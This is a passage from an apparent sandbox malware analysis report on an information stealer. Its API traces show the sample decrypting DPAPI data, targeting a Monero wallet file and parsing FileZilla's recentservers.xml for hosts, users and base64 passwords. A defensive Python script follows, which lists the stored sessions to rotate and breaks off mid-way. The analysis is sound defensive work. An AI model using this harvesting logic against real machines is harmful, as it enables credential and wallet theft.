                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39B2A
                  • LocalFree.KERNEL32(?,?,?,?,00D34EEE,00000000,?), ref: 00D39B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: bcb87221899f459d76dfd2557d74281706ea4331deb705a2a54c7853f479e7a6
                  • Instruction ID: 120917ecae51940dcfa74374313fee2550dec3dd8a6d98ea7fa7dbfa19d65597
                  • Opcode Fuzzy Hash: bcb87221899f459d76dfd2557d74281706ea4331deb705a2a54c7853f479e7a6
                  • Instruction Fuzzy Hash: BE11A4B4240208EFEB10CF64DC95FAAB7B5FB89700F248058F9199B390C7B5A941DB51
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00D50E00,00000000,?), ref: 00D479B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D479B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00D50E00,00000000,?), ref: 00D479C4
                  • wsprintfA.USER32 ref: 00D479F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 66a5d8fb8d53fe71b617546a71303e85bf09cb84340d5b788f33c7ea459f5b5c
                  • Instruction ID: f565ec22e9d29f49563de3da586704529f090fc0957c512406adbf83a15e022e
                  • Opcode Fuzzy Hash: 66a5d8fb8d53fe71b617546a71303e85bf09cb84340d5b788f33c7ea459f5b5c
                  • Instruction Fuzzy Hash: 7A112AB2904118ABCB14DFD9DD45BBEB7F8FB4CB11F14425AF605A2280D3395940D7B2
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00AFE128,00000000,?,00D50E10,00000000,?,00000000,00000000), ref: 00D47A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D47A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00AFE128,00000000,?,00D50E10,00000000,?,00000000,00000000,?), ref: 00D47A7D
                  • wsprintfA.USER32 ref: 00D47AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 7d39e3c1fe907fa0dd21e3c401c0a957b37854939702bb2b8ff2b492361e71f6
                  • Instruction ID: 54fec19354fc21b6df7f204724a13aa98b7b6bb6f2c826e59681ef597476c72b
                  • Opcode Fuzzy Hash: 7d39e3c1fe907fa0dd21e3c401c0a957b37854939702bb2b8ff2b492361e71f6
                  • Instruction Fuzzy Hash: 6F1182B1945218DFDB208B54DC49F59B778F744711F104395E90A932C0C7745A44CF62
                  APIs
                  • CoCreateInstance.COMBASE(00D4E118,00000000,00000001,00D4E108,00000000), ref: 00D43758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00D437B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: ed431a7ff9823f93bfd929b5a2d7bcce5411d68bbca71bd4fbebe05b11e22981
                  • Instruction ID: e2204b18fa239e4a8b4bdf36829aa95afe1dea6f295647ffcd10ed4ceafda9e1
                  • Opcode Fuzzy Hash: ed431a7ff9823f93bfd929b5a2d7bcce5411d68bbca71bd4fbebe05b11e22981
                  • Instruction Fuzzy Hash: 6E41D670A40A28AFDB24DB58CC95B9BB7B5BB48702F5041D8E618A7290D771AE85CF60
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D39B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D39BA3
                  • LocalFree.KERNEL32(?), ref: 00D39BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: cf61607e9df87026081bf6d17d33fbe887a2e22a5ebecd12a10d6d8944ac410b
                  • Instruction ID: d3448ae6c304cfa10988656883e536a604ac8a64d2c96bd68c0c9beb5ff5513d
                  • Opcode Fuzzy Hash: cf61607e9df87026081bf6d17d33fbe887a2e22a5ebecd12a10d6d8944ac410b
                  • Instruction Fuzzy Hash: CA11CCB8A00209DFDB04DF94D985AAEB7B9FF88300F104558E91597354D774AE51CF62
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: gNo$|t{~
                  • API String ID: 0-4251236080
                  • Opcode ID: a4b0b768fd71e8e3cd1d6f70858317f0216c1b9c4a183b1fdc66c233cac07e12
                  • Instruction ID: 15f0724c9f63c35a8872aedeab22099da3e9bd3d590724068b99db3a9102f768
                  • Opcode Fuzzy Hash: a4b0b768fd71e8e3cd1d6f70858317f0216c1b9c4a183b1fdc66c233cac07e12
                  • Instruction Fuzzy Hash: 186107F37081005FE304AA2EDC45B2BBBEBEBD4720F2A893DE5C5C7744E67598068652
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: pC}$~jky
                  • API String ID: 0-2841546395
                  • Opcode ID: 3a961691c7cbc23a04eb30c8774726dbeb4a8311140a572821725a332f57df53
                  • Instruction ID: 84edd82da8f1f07f06a29e3928e9b5b87c83aecde9ac0456090be3e0b618894c
                  • Opcode Fuzzy Hash: 3a961691c7cbc23a04eb30c8774726dbeb4a8311140a572821725a332f57df53
                  • Instruction Fuzzy Hash: EB310BB3B046044BF3485C7EDD9536BB6969BD4310F1BC13ED98593B84EC7999094382
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: E}
                  • API String ID: 0-3764991304
                  • Opcode ID: 2a4e674aa7214856188db6d50203738c4b039a3d2d6a6fb465dd36115f79e3e5
                  • Instruction ID: 8e61cbe4eabd8fb02634251a331bc337125a39fea6add3884f3a65d22f0db331
                  • Opcode Fuzzy Hash: 2a4e674aa7214856188db6d50203738c4b039a3d2d6a6fb465dd36115f79e3e5
                  • Instruction Fuzzy Hash: A5F1E1F39082049FE304AF29EC8567AFBE5EF94720F16493DEAC4C7304E63599558A87
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: [Ss;
                  • API String ID: 0-3869967431
                  • Opcode ID: dfe4fb43f8e7cf50f486f1cc687fd8346da1877876cb9afc19fa3b46b8ca8723
                  • Instruction ID: 6e86d2f02927092b2a436daf17bed13b6ce46c6c94c312dbc8f34108023887ab
                  • Opcode Fuzzy Hash: dfe4fb43f8e7cf50f486f1cc687fd8346da1877876cb9afc19fa3b46b8ca8723
                  • Instruction Fuzzy Hash: 8CE108F3A092049FE310AE2DDC8176AFBE9EF94720F1A893DE6C4C3744E53598158697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: W7zl
                  • API String ID: 0-3345917725
                  • Opcode ID: 0b8f75343fb5494af301678dc68fc83fdea3def72ca80b7c2b7dc8cca639bb20
                  • Instruction ID: 2fffb141b302725911e4a5294a5e760178dac110d33ee7e8ea4cdf23bfb65bfc
                  • Opcode Fuzzy Hash: 0b8f75343fb5494af301678dc68fc83fdea3def72ca80b7c2b7dc8cca639bb20
                  • Instruction Fuzzy Hash: FE61DFB3A08604AFE3096E29DC5577EBBE6EF94320F16493DDAC9C3744DA3448418B86
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: }!?}
                  • API String ID: 0-4160007223
                  • Opcode ID: 13364f950de8d96b84168b6684edb2f30e9b6b69ad9c401904ef3cb409a8b25c
                  • Instruction ID: 748ac8f9e1862c1d2699fa6276367f912de3a461719b68cdb5d1273d2dc8c22c
                  • Opcode Fuzzy Hash: 13364f950de8d96b84168b6684edb2f30e9b6b69ad9c401904ef3cb409a8b25c
                  • Instruction Fuzzy Hash: D461F7F3A0C6009FE308AA29DC4577EB7E6EFD4710F16892CD6C883784EA3848458756
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Q-n
                  • API String ID: 0-4097762733
                  • Opcode ID: 470e4b697add6a482b73d6790ee9fdeb43b21bd0fd5072b08ccf77d71f2bde59
                  • Instruction ID: ba98064314f5980fd765d4af623c2313bc3b613f7629fe483cc55993d646779a
                  • Opcode Fuzzy Hash: 470e4b697add6a482b73d6790ee9fdeb43b21bd0fd5072b08ccf77d71f2bde59
                  • Instruction Fuzzy Hash: 0C51E8F39086108BE310BE2CDC8536ABBE5EF94320F1A463DDEC4D7744E579985586C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cbf8cd4c4a9e283cbf3b956f11b9dd969b5cb0f0101107a1e0d381d0132d8575
                  • Instruction ID: 8ea22ce9aa8c4d4abb5536bbe1415e398e80fd928092859e7a74d002e427228e
                  • Opcode Fuzzy Hash: cbf8cd4c4a9e283cbf3b956f11b9dd969b5cb0f0101107a1e0d381d0132d8575
                  • Instruction Fuzzy Hash: C15108F3A082149BF3186A29DC557BBBBD6EBE4720F1A453DD7C9837C0D93A48058786
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e87e4ef9d7f6da88154a877a7e4fd87d0dd8b6b3d16d32964dce806ea866539b
                  • Instruction ID: a79c547e23b32b3841f1840b0a4b14ab206cd5e9555e121ce6a73cb84cb4ef53
                  • Opcode Fuzzy Hash: e87e4ef9d7f6da88154a877a7e4fd87d0dd8b6b3d16d32964dce806ea866539b
                  • Instruction Fuzzy Hash: F541F9B360C6009FE748AE39EC84A7ABBE6EBD4310F16C53DE6C487758EA3548458646
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48d344ba7a73f933a09a055be8fd2b013be35b3606b1232e67b7fe1e01d4324c
                  • Instruction ID: b634bfcf0d82606117bf4df815cd637fbf85edd0838556b4dc1338593e153371
                  • Opcode Fuzzy Hash: 48d344ba7a73f933a09a055be8fd2b013be35b3606b1232e67b7fe1e01d4324c
                  • Instruction Fuzzy Hash: 623110F7F142101BF304A969DC857BAB296EBD4321F2B843DDB88A7780E9798C018681
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                    • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                    • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                    • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                    • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                    • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                    • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00D50DBA,00D50DB7,00D50DB6,00D50DB3), ref: 00D40362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D40369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00D40385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00D403CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D403DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00D40419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00D40463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D4051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D4054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00D40562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00D40571
                  • lstrcat.KERNEL32(?,url: ), ref: 00D40580
                  • lstrcat.KERNEL32(?,00000000), ref: 00D40593
                  • lstrcat.KERNEL32(?,00D51678), ref: 00D405A2
                  • lstrcat.KERNEL32(?,00000000), ref: 00D405B5
                  • lstrcat.KERNEL32(?,00D5167C), ref: 00D405C4
                  • lstrcat.KERNEL32(?,login: ), ref: 00D405D3
                  • lstrcat.KERNEL32(?,00000000), ref: 00D405E6
                  • lstrcat.KERNEL32(?,00D51688), ref: 00D405F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00D40604
                  • lstrcat.KERNEL32(?,00000000), ref: 00D40617
                  • lstrcat.KERNEL32(?,00D51698), ref: 00D40626
                  • lstrcat.KERNEL32(?,00D5169C), ref: 00D40635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D4068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: 5072b86b498d7439252f6ce6c01456aa53af2c891f59cf14d907bf66b88123ee
                  • Instruction ID: fcbd104fb874e8037ab379a477eee5d66443cd1d8fc90c72cb79b50c314b835c
                  • Opcode Fuzzy Hash: 5072b86b498d7439252f6ce6c01456aa53af2c891f59cf14d907bf66b88123ee
                  • Instruction Fuzzy Hash: 2BD13C76940208AFDB04EBF4DD96EEE7738EF58301F444418F506A6091EF74AA4ADB72
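The trace above shows the sample locating `\AppData\Roaming\FileZilla\recentservers.xml`, reading the whole file into a LocalAlloc buffer, scanning it with StrStrA for the literal tags `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">`, and concatenating a `browser: FileZilla` / `profile: null` / `url:` / `login:` / `password:` record. The Python below is an added example, not code from the report or from the sample: it parses the same file as XML and lists which stored sessions were in scope for theft, so a responder can decide which FTP/SFTP credentials to rotate after an infection. The XML document, host names, user name and password value are constructed for the example. Because the sample's search is a plain string match, a `<Pass>` element whose `encoding` attribute is anything other than `base64` would not be found by that particular comparison; the script reports that separately from whether a password is stored at all.

```python
import os
import xml.etree.ElementTree as ET

# Constructed sample in the layout FileZilla uses for recentservers.xml.
# Hosts, users and the base64 value are made up for this example.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.internal.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""

# The literal the sample hands to StrStrA; any other <Pass ...> form is not matched by it.
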